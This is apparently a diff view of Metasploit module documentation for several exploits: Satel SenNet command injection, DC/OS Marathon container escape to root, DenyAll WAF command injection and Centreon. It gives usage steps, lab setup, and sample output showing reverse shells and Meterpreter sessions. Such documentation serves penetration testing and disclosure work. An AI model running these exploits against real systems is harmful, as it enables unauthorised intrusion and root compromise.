3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/snmp/epmp_snmp_loot msf > use auxiliary/scanner/snmp/epmp_snmp_loot

View File

@ -14,7 +14,7 @@
5. Do: `run` 5. Do: `run`
6. You will hopefully see something similar to, followed by a session: 6. You will hopefully see something similar to, followed by a session:
````[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '``` ```[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '```
## Options ## Options

View File

@ -0,0 +1,28 @@
This module exploits an OS Command Injection vulnerability in Satel SenNet Data Logger and Electricity Meters to perform arbitrary command execution as 'root'.
The following versions of SenNet Data Logger and Electricity Meters, monitoring platforms, are affected:
1. SenNet Optimal DataLogger V5.37c-1.43c and prior,
2. SenNet Solar Datalogger V5.03-1.56a and prior, and
3. SenNet Multitask Meter V5.21a-1.18b and prior.
## Verification Steps
1. Do: ```use auxiliary/scanner/telnet/satel_cmd_exec```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
```
msf > use auxiliary/scanner/telnet/satel_cmd_exec
msf auxiliary(satel_cmd_exec) > set rhosts 1.3.3.7
msf auxiliary(satel_cmd_exec) > run
[*] 1.3.3.7:5000 - Sending command now - id;
[+] 1.3.3.7:5000 - uid=0(root) gid=0(root)
[+] 1.3.3.7:5000 - File saved in: /root/.msf4/loot/20000000000003_1.3.3.7_cmdexeclog_12345.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -187,7 +187,7 @@ finish
## Scenarios ## Scenarios
Just a standard run. Just a standard run.
```
msf > use exploit/linux/http/centreon_useralias_exec msf > use exploit/linux/http/centreon_useralias_exec
msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python payload => cmd/unix/reverse_python

View File

@ -0,0 +1,192 @@
# Vulnerable Application
Utilizing the DCOS Cluster's Marathon UI, an attacker can create
a docker container with the '/' path mounted with read/write
permissions on the host server that is running the docker container.
As the docker container executes command as uid 0 it is honored
by the host operating system allowing the attacker to edit/create
files owed by root. This exploit abuses this to creates a cron job
in the '/etc/cron.d/' path of the host server.
*Notes: The docker image must be a valid docker image from
hub.docker.com. Further more the docker container will only
deploy if there are resources available in the DC/OS
## DCOS
This Exploit was tested with CentOS 7 as the host operating system for
the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with
Default 'custom' installation for on site premise setup. Only the Install
part of the DCOS guide was completed, the system hardening and securing
your cluster section where skipped. This is to represent a 'Default' install
with a system admin conducting hasty deployments taking no thought about security.
## To Setup Your Cluster
I recommend doing a 'on-premise'/custom
cluster. https://dcos.io/docs/1.8/administration/installing/custom/
Create a virtual CentOS machine, install requirements base on the above
guide.
```bash
# The TLDR from the above guide
sudo systemctl stop firewalld && sudo systemctl disable firewalld
sudo yum install -y tar xz unzip curl ipset ntp
sudo systemctl start ntpd
sudo systemctl enable ntpd
sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \
sudo groupadd nogroup && sudo reboot
```
Install a supported version of docker on the CentOS systems
https://dcos.io/docs/1.8/administration/installing/custom/system-requirements/install-docker-centos/
```bash
# The TLDR of the above guide
sudo yum -y remove docker docker-common container-selinux
sudo yum -y remove docker-selinux
sudo yum install -y yum-utils
sudo yum-config-manager \
--add-repo \
https://docs.docker.com/engine/installation/linux/repo_files/centos/docker.repo
sudo yum-config-manager --enable docker-testing
sudo yum makecache fast
sudo yum -y install docker-engine-1.11.2
sudo systemctl start docker
sudo systemctl enable docker
sudo echo overlay > /etc/modules-load.d/overlay.conf
sudo reboot
```
Once the CentOS machine has rebooted, edit the systemctl
service file for docker and change the ExecStart- line to
`ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://`
restart the docker service and verify it is running.
lastly generate ssh rsa keys for authentication. And update the
/etc/ssh/sshd_config file to support root login.
```bash
ssh-keygen -t rsa -b 4096
# Press enter until complete, DO NOT PUT A PASSWORD.
cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys
cat ~/.ssh/id_rsa # save the output you will need it for later
rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later
```
Shut down the CentOS vm, take a snapshot. (This will be your base)
clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent.
Start the DCOS-Master and DCOS-Agent virtual machines You just cloned.
Login and get their current IP address.
* Note: I recommend giving them static IPs if you have further use for the cluster.
From here use another Linux machine with docker installed to finish
the installation process. I used an Ubuntu machine with docker installed.
Follow the custom CLI guide for creating the required files in
the genconf folder.
https://dcos.io/docs/1.8/administration/installing/custom/cli/
Example genconf/config.yaml
```
---
agent_list:
- 192.168.0.10
bootstrap_url: file:///opt/dcos_install_tmp
cluster_name: DCOS
exhibitor_storage_backend: static
ip_detect_filename: /genconf/ip-detect
master_discovery: static
master_list:
- 192.168.0.9
process_timeout: 10000
resolvers:
- 8.8.8.8
- 8.8.4.4
ssh_port: 22
ssh_user: root
```
Example genconf/ip-detect
```bash
#!/usr/bin/env bash
set -o nounset -o errexit
export PATH=/usr/sbin:/usr/bin:$PATH
ip=$(ip addr show ens33)
echo $( echo $ip | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | head -1)
```
place your id_rsa ssh key into the genconf file and rename the
file to ssh_key and `chmod 0600 genconf/ssh_key`
Deploying the cluster
in the folder containing the genconf folder do the following.
NOTE: if following the cli install from DCOS itself, it will fail
if you do --install-prereqs. It will install an unsupported version of
docker.
```bash
curl -O https://downloads.dcos.io/dcos/stable/dcos_generate_config.sh
chmod +x dcos_generate_config.sh
sudo ./dcos_generate_config.sh --genconf
sudo ./dcos_generate_config.sh --preflight
# If all preflight checks pass
sudo ./dcos_generate_config.sh --deploy
# get a cup of coffie
# wait a minute or two after deploy completes
sudo bash dcos_generate_config.sh --postflight
```
If all is passing navigate to http://[master_ip]:8080/
You should see the Marathon UI web application.
# Exploitation
This module is designed for the attacker to leverage, creation of a
docker container with out authentication through the DCOS Marathon UI
to gain root access to the hosting server of the docker container
in the DCOS cluster.
## Options
- DOCKERIMAGE is the hub.docker.com docker container image you are wanting to have the DCOS Cluster to deploy for this exploit.
- TARGETURI this is the path to make the Marathon UI web request to. By default this is /v2/apps
- WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start.
- CONTAINER_ID is optional if you want to have your container docker have a human readable name else it will be randomly generated
## Steps to exploit with module
- [ ] Start msfconsole
- [ ] use exploit/linux/http/dcos_marathon
- [ ] Set the options appropriately and set VERBOSE to true
- [ ] Verify it creates a docker container and it successfully runs
- [ ] After a minute a session should be opened from the agent server
## Example Output
```
msf > use exploit/linux/http/dcos_marathon
msf exploit(dcos_marathon) > set RHOST 192.168.0.9
RHOST => 192.168.0.9
msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(dcos_marathon) > set LHOST 192.168.0.100
LHOST => 192.168.0.100
msf exploit(dcos_marathon) > set verbose true
verbose => true
msf exploit(dcos_marathon) > check
[*] 192.168.0.9:8080 The target appears to be vulnerable.
msf exploit(dcos_marathon) > exploit
[*] Started reverse TCP handler on 192.168.0.100:4444
[*] Setting container json request variables
[*] Creating the docker container command
[*] The docker container is created, waiting for it to deploy
[*] Waiting up to 60 seconds for docker container to start
[*] The docker container is running, removing it
[*] Waiting for the cron job to run, can take up to 60 seconds
[*] Sending stage (39690 bytes) to 192.168.0.10
[*] Meterpreter session 1 opened (192.168.0.100:4444 -> 192.168.0.10:54468) at 2017-03-01 14:22:02 -0500
[+] Deleted /etc/cron.d/FOWkTeZL
[+] Deleted /tmp/TIWpOfUR
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UTC 2016
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
```

View File

@ -0,0 +1,47 @@
## Vulnerable Application
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
It's possible to have trial demo for 15 days at Amazon Marketplace.
[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
You just need to follow instruction above URL.
## Verification Steps
A successful check of the exploit will look like this:
- [ ] Start `msfconsole`
- [ ] `use use exploit/linux/http/denyall_exec`
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Run `check`
- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `iToken` value extraction.
- [ ] **Verify** that you are getting `meterpreter` session.
## Scenarios
```
msf > use exploit/linux/http/denyall_exec
msf exploit(denyall_exec) >
msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit
[*] Started reverse TCP handler on 35.12.3.3:4444
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
[*] Trigerring command injection vulnerability with iToken value.
[*] Sending stage (40411 bytes) to 35.176.123.128
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300
meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter >
```

Some files were not shown because too many files have changed in this diff Show More